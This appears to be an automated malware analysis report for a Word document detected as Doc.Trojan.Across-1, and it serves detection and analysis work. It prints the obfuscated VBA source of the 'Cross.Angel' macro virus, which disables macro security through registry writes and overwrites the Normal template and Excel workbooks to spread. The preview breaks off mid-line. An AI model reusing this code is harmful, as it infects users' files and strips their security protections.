Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd4ed91505c87da6…

MALICIOUS

Office (OLE)

Size: 44.5 KB
Created: 2000-03-22 16:28:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 87b7e15f63e9ef3c56494dc9721d0b07
SHA-1: 81068ffdf0767aaca1277980bf1d5ffe743d308e
SHA-256: fd4ed91505c87da67e611721a544b9b2bf442855cc0d376566effcb3d723524c
Risk Score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to lower Office macro security by writing to registry keys that hold the Word and Excel security settings (via System.PrivateProfileString and a generated REGEDIT4 file). It also overwrites the code module of the Normal template and of open Excel workbooks with its own source, which is likely intended to establish persistence and to spread between documents. The ClamAV detection 'Doc.Trojan.Across-1' further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Trojan.Across-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Across-1
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                   Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)      27921 bytes

SHA-256: ce2ec774a495e3a6052cfb3f01f133a4466c23003f561aac0228b0943a3d9d1a
Detection: ClamAV: Doc.Trojan.Across-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¹­®§ = &H1, ¯¹­®§_ = &H0, ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 12, µ—Ê·¦ = "excel.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If Application.Version = µÈÇŠ¿ Then
    Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = ¯¹­®§
Else
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ¯¹­®§_
    Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
    Options.VirusProtection = (Rnd * ¯¶˜™²)
End If
Options.SaveNormalPrompt = (Rnd * ¯¶˜™²)
’¸„„„ = ‚–˜¤�(ThisDocument.VBProject.VBComponents(¢Â¶¥•).CodeModule.Lines(¢Â¶¥•, •Ǥ Ÿ))
If MacroContainer = ActiveDocument Then Set µˆ˜ˆŸ = NormalTemplate Else Set µˆ˜ˆŸ = ActiveDocument
With µˆ˜ˆŸ.VBProject.VBComponents(¢Â¶¥•).CodeModule
    If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
        .DeleteLines ¢Â¶¥•, .CountOfLines
        .InsertLines ¢Â¶¥•, ’¸„„„
        If µˆ˜ˆŸ = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
    End If
End With
If System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") <> ¢Â¶¥• Then
Set ´°ƒˆ� = GetObject(, µ—Ê·¦)
If ´°ƒˆ� = "" Then Set ´°ƒˆ� = CreateObject(µ—Ê·¦): ª±›¤Ã = ¢Â¶¥•
If ª±›¤Ã <> ¢Â¶¥• Then
    For Each †�„–À In ´°ƒˆ�.Workbooks
       With †�„–À.VBProject.VBComponents(¼Æ±¬•).CodeModule
            If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
                .DeleteLines ¢Â¶¥•, .CountOfLines
                .InsertLines ¢Â¶¥•, ’¸„„„
                If †�„–À.Path <> "" Then †�„–À.Save Else †�„–À.SaveAs †�„–À.FullName
            End If
        End With
    Next
Else
    For †�„–À = ¢Â¶¥• To ´°ƒˆ�.Application.RecentFiles.Maximum
        ´°ƒˆ�.Application.RecentFiles(†�„–À).Open
            With ´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).VBProject.VBComponents(¼Æ±¬•).CodeModule
                If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
                    .DeleteLines ¢Â¶¥•, .CountOfLines
                    .InsertLines ¢Â¶¥•, ’¸„„„
                End If
            End With
        ´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).Close ¢Â¶¥•
    Next
    ´°ƒˆ�.Quit
End If
System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") = ¢Â¶¥•
End If
If Minute(Now()) = Int(Rnd * 60) + 1 Then MsgBox "Why I lost my angel? Can't live without you!", vbQuestion, "Cross.Angel by jackie-/Lz0NT/MVT"
If System.PrivateProfileString("c:\.ini", "Carinthia", "Word") <> ¢Â¶¥• Then System.PrivateProfileString("c:\.ini", "Carinthia", "Word") = ¢Â¶¥•
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 10, µ—Ê·¦ = "word.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If UCase(Dir("c:\.reg")) <> ".REG" Then
Open "c:\.reg" For Output As #1
    Print #1, "REGEDIT4"
If Application.Version = µÈÇŠ¿ Then
    Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
    Print #1, """Level""=dword:00000001"
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
    Print #1, """Level""=dword:00000001"
Else
    Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
    Print #1, """Options6""=dword:00000000
... (truncated)